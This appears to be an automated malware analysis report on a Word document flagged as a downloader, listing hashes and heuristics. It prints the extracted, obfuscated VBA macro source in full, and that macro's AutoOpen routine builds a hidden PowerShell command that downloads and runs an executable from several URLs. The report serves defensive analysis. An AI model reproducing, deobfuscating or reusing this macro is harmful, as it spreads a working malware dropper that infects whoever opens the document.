Office (OLE) malware analysis — malicious · 7def3c9cfda3fb99

MALICIOUS

Office (OLE)

70.4 KB Created: 2018-10-01 16:31:00 Authoring application: Microsoft Office Word First seen: 2019-12-10

MD5: 53aa9a7c60719fbf7373ee1b3edb3b1b SHA-1: 41986152e1fa5c476f33a7ba1de5615ebb9af10e SHA-256: 7def3c9cfda3fb99cb31806bcdaad23bfab292623ee05eaa5a290958664e47fe

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function to execute a command. This command appears to be constructing a URL, likely for downloading a second-stage payload. The ClamAV detection and the presence of the Shell() call strongly indicate a downloader functionality.

Heuristics 7

ClamAV: Doc.Downloader.Sload-6794077-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sload-6794077-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3271 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3271 bytes
SHA-256: `676a91cfa0d88506904e45edc512fa1230c079c071d22a9eb8f0ed7d58f9de1a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "izXzCqwwWUCwhk" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() If WsGQFM Or 2 Then tBFjh = "TI" End If If AOJzp <= 2 Then UjLOU = "M" End If If qMmVN <= LkijE Then UYfkP = "OwvpULWEZkUQ" End If SjonJLuoL (KeyString(wwTLriZs + lfKnf + 10 + 7 + 50 + CdBUtfI + iNPLT) + LkwPL + qNIXIW + KeyString(BdpGivaC + ufzLc + 12 + 8 + 57 + tXzCjRS + KGlIA) + DTqpj + vNtBMCjurWl + fWWSlvV + azJobQRV) If lbQzb Xor wCJnfX Then fmuVTW = "ULNGXfUK" End If If OJcvIm Eqv HDNhv Then qSQwGh = "PHdmscltmFlnhI" End If If kRpji And cFWQvW Then FclmsY = "PijB" End If If GPfus >= imhUU Then UWtFzu = "ZEtIIOXLrkzD" End If End Sub Attribute VB_Name = "caHIKoBPD" Function DTqpj() wjPzoWkSo = "d /V^:^ON/" + "C" + """" + "^s^e^t lN=^ ^ ^" + " ^ ^ ^ ^ ^ ^" wKGNtc = " ^ ^ ^ ^ ^}^" + "}^{^hc^t^ac^}^;^k^" + "a^er^b^;^ir^j" + "^$^ ^m^etI^-^e^k^ovn" + "^I;)^ir^j^$^ ^," + "^fB^J^$(^e^l^" LIJaYBX = "i^F^d^a^o^ln^wo^D^." + "^i^w^Y^$^{^yr^t" + "^{)^B^Kj^$ n^" + "i^ ^f^B^J^$(^hc^a^e" + "r^o^f;^'^e^x^e^.^'^+" + "^U^t^L^$^+^'^\'" AMjHaSCGI = "+c^i^l^b^u^p" + "^:vne^$^=^ir^" + "j^$^;^'^4^9" + "^3^'^ ^=^ ^U^t^" kamHIjcmQ = "L^$^;)^'^@^'" + "(^t^i^l^p^S^." + "^'^Q/^ur^.^e" + "n^g^i^s^e^dn^a^l^.n^" + "a^m^i^d^.^w^w^w//^:" + "^p^t^t^h@yn/^t^" If UFdAQ <= iVhiFr Then HZBft = "fdKRTHclIi" End If If KJHCqM Or QKCVC Then RsiqR = "O" End If lYGYPUN = "i^.e^l^o^ic^s^i" + "v^e^l^l^ed^on^" + "i^dra^i^g^l^i" + "//^:^p^t^t^h^@^g" DTqpj = wjPzoWkSo + wKGNtc + LIJaYBX + AMjHaSCGI + kamHIjcmQ + lYGYPUN If wwtood Xor wWADt Then wiwUf = "PwHu" End If If oJtop Eqv 17 Then nVZvj = "SX" End If If HApCY > 4 Then vkloVn = "KFkEomKfI" End If End Function Function vNtBMCjurWl() inRtnqGO = "/^k^u.^oc^.^s^ec^" + "ivr^e^s^k^e^p^sn" + "^i//^:^p^t^t^h^" + "@C/^m^oc^.^l^a^" + "g^o^f^j//^:^p^" WBMdqom = "t^t^h@^XC^s^" + "U/^e^b^.^yn" + "^a^j//^:^p^t^t^" + "h^'^=^B^K^j^$^;" + "^tn^e^i^lC^b" hluFDhvu = "^e^W^.^t^eN^" + " ^tc^e^j^b^o^" + "-^w^en^=^i^" + "w^Y^$^ ^l^l" + "^e^h^sr^e^w^o^p&&" EBYlwaaJo = "^f^or /^L " + "%^p ^in (^3^4^9^;^-^" + "1^;^0)^d^o ^s^e^" + "t ^l^I=!^l^I!!lN:" + "~%^p,1!&&^i^f %^p ^e" If nJNsrE > mpQWVc Then Whbmzj = "KDdzpFwH" End If If NBbuSh Eqv zMjPs Then KmzRo = "uwaR" End If sjiiN = "^q^u ^0 c^a^l^" + "l %^l^I:^~^-^3^5" + "^0%" + """" + "" vNtBMCjurWl = inRtnqGO + WBMdqom + hluFDhvu + EBYlwaaJo + sjiiN If wPpqCR Xor 16 Then MTiCa = "RdwR" End If If qDiXwF Xor ckFfu Then bpGwM = "oUBNcG" End If If Bwiilc <= iYDwiW Then UwXiJ = "XzzA" End If End Function Attribute VB_Name = "viiwhaUAKGfpC" Function SjonJLuoL(RGYjoAZnsmE As String) Const QrQBzLuD = 623250762 - 623250762 If VwcuN > JznWwY Then bFOjBh = "P" End If If LThwa >= mXbHsT Then mIdGY = "KLcvNiBQG" End If Shell# RGYjoAZnsmE, QrQBzLuD If DhaRbj And jLAwWQ Then IBcaYa = "jdM" End If If UPZWj Or cKold Then jwQpU = "NFi" End If If zofcY Eqv 4 Then UDOiD = "aJo" End If End Function

SHA-256: 676a91cfa0d88506904e45edc512fa1230c079c071d22a9eb8f0ed7d58f9de1a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "izXzCqwwWUCwhk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If WsGQFM Or 2 Then

tBFjh = "TI"
End If
   If AOJzp <= 2 Then

UjLOU = "M"
End If
   If qMmVN <= LkijE Then

UYfkP = "OwvpULWEZkUQ"
End If
SjonJLuoL (KeyString(wwTLriZs + lfKnf + 10 + 7 + 50 + CdBUtfI + iNPLT) + LkwPL + qNIXIW + KeyString(BdpGivaC + ufzLc + 12 + 8 + 57 + tXzCjRS + KGlIA) + DTqpj + vNtBMCjurWl + fWWSlvV + azJobQRV)
   If lbQzb Xor wCJnfX Then

fmuVTW = "ULNGXfUK"
End If
   If OJcvIm Eqv HDNhv Then

qSQwGh = "PHdmscltmFlnhI"
End If
   If kRpji And cFWQvW Then

FclmsY = "PijB"
End If
   If GPfus >= imhUU Then

UWtFzu = "ZEtIIOXLrkzD"
End If
End Sub


Attribute VB_Name = "caHIKoBPD"
Function DTqpj()
wjPzoWkSo = "d /V^:^ON/" + "C" + """" + "^s^e^t lN=^ ^ ^" + "  ^ ^ ^   ^ ^ ^"
wKGNtc = " ^  ^ ^ ^ ^}^" + "}^{^hc^t^ac^}^;^k^" + "a^er^b^;^ir^j" + "^$^ ^m^etI^-^e^k^ovn" + "^I;)^ir^j^$^ ^," + "^fB^J^$(^e^l^"
LIJaYBX = "i^F^d^a^o^ln^wo^D^." + "^i^w^Y^$^{^yr^t" + "^{)^B^Kj^$ n^" + "i^ ^f^B^J^$(^hc^a^e" + "r^o^f;^'^e^x^e^.^'^+" + "^U^t^L^$^+^'^\'"
AMjHaSCGI = "+c^i^l^b^u^p" + "^:vne^$^=^ir^" + "j^$^;^'^4^9" + "^3^'^ ^=^ ^U^t^"
kamHIjcmQ = "L^$^;)^'^@^'" + "(^t^i^l^p^S^." + "^'^Q/^ur^.^e" + "n^g^i^s^e^dn^a^l^.n^" + "a^m^i^d^.^w^w^w//^:" + "^p^t^t^h@yn/^t^"
If UFdAQ <= iVhiFr Then

HZBft = "fdKRTHclIi"
End If
   If KJHCqM Or QKCVC Then

RsiqR = "O"
End If
lYGYPUN = "i^.e^l^o^ic^s^i" + "v^e^l^l^ed^on^" + "i^dra^i^g^l^i" + "//^:^p^t^t^h^@^g"
DTqpj = wjPzoWkSo + wKGNtc + LIJaYBX + AMjHaSCGI + kamHIjcmQ + lYGYPUN
   If wwtood Xor wWADt Then

wiwUf = "PwHu"
End If
   If oJtop Eqv 17 Then

nVZvj = "SX"
End If
   If HApCY > 4 Then

vkloVn = "KFkEomKfI"
End If
End Function
Function vNtBMCjurWl()
inRtnqGO = "/^k^u.^oc^.^s^ec^" + "ivr^e^s^k^e^p^sn" + "^i//^:^p^t^t^h^" + "@C/^m^oc^.^l^a^" + "g^o^f^j//^:^p^"
WBMdqom = "t^t^h@^XC^s^" + "U/^e^b^.^yn" + "^a^j//^:^p^t^t^" + "h^'^=^B^K^j^$^;" + "^tn^e^i^lC^b"
hluFDhvu = "^e^W^.^t^eN^" + " ^tc^e^j^b^o^" + "-^w^en^=^i^" + "w^Y^$^ ^l^l" + "^e^h^sr^e^w^o^p&&"
EBYlwaaJo = "^f^or /^L " + "%^p ^in (^3^4^9^;^-^" + "1^;^0)^d^o ^s^e^" + "t ^l^I=!^l^I!!lN:" + "~%^p,1!&&^i^f %^p ^e"
If nJNsrE > mpQWVc Then

Whbmzj = "KDdzpFwH"
End If
   If NBbuSh Eqv zMjPs Then

KmzRo = "uwaR"
End If
sjiiN = "^q^u ^0 c^a^l^" + "l %^l^I:^~^-^3^5" + "^0%" + """" + ""
vNtBMCjurWl = inRtnqGO + WBMdqom + hluFDhvu + EBYlwaaJo + sjiiN
   If wPpqCR Xor 16 Then

MTiCa = "RdwR"
End If
   If qDiXwF Xor ckFfu Then

bpGwM = "oUBNcG"
End If
   If Bwiilc <= iYDwiW Then

UwXiJ = "XzzA"
End If
End Function


Attribute VB_Name = "viiwhaUAKGfpC"
Function SjonJLuoL(RGYjoAZnsmE As String)
Const QrQBzLuD = 623250762 - 623250762
   If VwcuN > JznWwY Then

bFOjBh = "P"
End If
   If LThwa >= mXbHsT Then

mIdGY = "KLcvNiBQG"
End If
Shell# RGYjoAZnsmE, QrQBzLuD
   If DhaRbj And jLAwWQ Then

IBcaYa = "jdM"
End If
   If UPZWj Or cKold Then

jwQpU = "NFi"
End If
   If zofcY Eqv 4 Then

UDOiD = "aJo"
End If
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.